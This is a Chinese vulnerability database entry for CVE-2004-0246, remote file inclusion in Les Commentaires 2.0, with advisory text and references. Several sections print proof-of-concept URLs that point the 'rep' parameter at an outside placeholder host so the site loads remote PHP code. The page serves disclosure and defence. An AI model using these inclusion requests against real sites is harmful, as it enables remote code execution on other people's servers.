CVE-2004-0246
CVSS10.0
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:42:22
NMCOES    

[原文]Multiple PHP remote file inclusion vulnerabilities in (1) fonctions.lib.php, (2) derniers_commentaires.php, and (3) admin.php in Les Commentaires 2.0 allow remote attackers to execute arbitrary PHP code via the rep parameter.


[CNNVD]Laurent Adda Les Commentaires PHP多个模块脚本文件包含漏洞(CNNVD-200411-164)

        Les Commentaires 2.0的(1)fonctions.lib.php,(2)derniers_commentaires.php,以及(3)admin.php存在多个PHP remote file inclusion漏洞,远程攻击者可以借助rep参数执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0246
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0246
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-164
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107584083719763&w=2
(UNKNOWN)  BUGTRAQ  20040203 Les Commentaires (PHP) Include file
http://www.securityfocus.com/bid/9536
(VENDOR_ADVISORY)  BID  9536
http://xforce.iss.net/xforce/xfdb/15010
(VENDOR_ADVISORY)  XF  lescommentaires-multiple-file-include(15010)

- 漏洞信息

Laurent Adda Les Commentaires PHP多个模块脚本文件包含漏洞
危急 输入验证
2004-11-23 00:00:00 2005-10-20 00:00:00
远程  
        Les Commentaires 2.0的(1)fonctions.lib.php,(2)derniers_commentaires.php,以及(3)admin.php存在多个PHP remote file inclusion漏洞,远程攻击者可以借助rep参数执行任意PHP代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (23619)

Laurent Adda Les Commentaires 2.0 PHP Script fonctions.lib.php Remote File Inclusion (EDBID:23619)
php webapps
2004-01-30 Verified
0 Himeur Nourredine
N/A [点击下载]
source: http://www.securityfocus.com/bid/9536/info

It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system.

All versions of Les Commentaires have been reported to be prone to this issue.

http://www.example.com/config/fonctions.lib.php?rep=http://www.example.com/		

- 漏洞信息 (23620)

Laurent Adda Les Commentaires 2.0 PHP Script derniers_commentaires.php Remote File Inclusion (EDBID:23620)
php webapps
2004-01-30 Verified
0 Himeur Nourredine
N/A [点击下载]
source: http://www.securityfocus.com/bid/9536/info
 
It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system.
 
All versions of Les Commentaires have been reported to be prone to this issue.

http://www.example.com/derniers_commentaires.php?rep=http://www.example.com/		

- 漏洞信息 (23621)

Laurent Adda Les Commentaires 2.0 PHP Script admin.php Remote File Inclusion (EDBID:23621)
php webapps
2004-01-30 Verified
0 Himeur Nourredine
N/A [点击下载]
source: http://www.securityfocus.com/bid/9536/info
  
It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system.
  
All versions of Les Commentaires have been reported to be prone to this issue.

http://www.example.com/admin.php?rep=http://www.example.com/		

- 漏洞信息

15990
Les Commentaires derniers_commentaires.php Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Les Commentaires contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'derniers_commentaires.php' not properly sanitizing user input supplied to the 'rep' variable. This may allow a remote attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2004-02-03 Unknow
2004-02-03 Unknow

- 解决方案

Upgrade to version Les Commentaires 2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Laurent Adda Les Commentaires PHP Script Multiple Module File Include Vulnerability
Input Validation Error 9536
Yes No
2004-01-30 12:00:00 2009-07-12 02:06:00
The disclosure of this issue has been credited to Himeur Nourredine <lostnoobs@security-challenge.com>.

- 受影响的程序版本

Laurent Adda Les Commentaires 2.0

- 漏洞讨论

It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system.

All versions of Les Commentaires have been reported to be prone to this issue.

- 漏洞利用

No exploit is required.

The following proof of concept has been supplied:
http://www.example.com/config/fonctions.lib.php?rep=http://www.example.com/
http://www.example.com/derniers_commentaires.php?rep=http://www.example.com/
http://www.example.com/admin.php?rep=http://www.example.com/

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站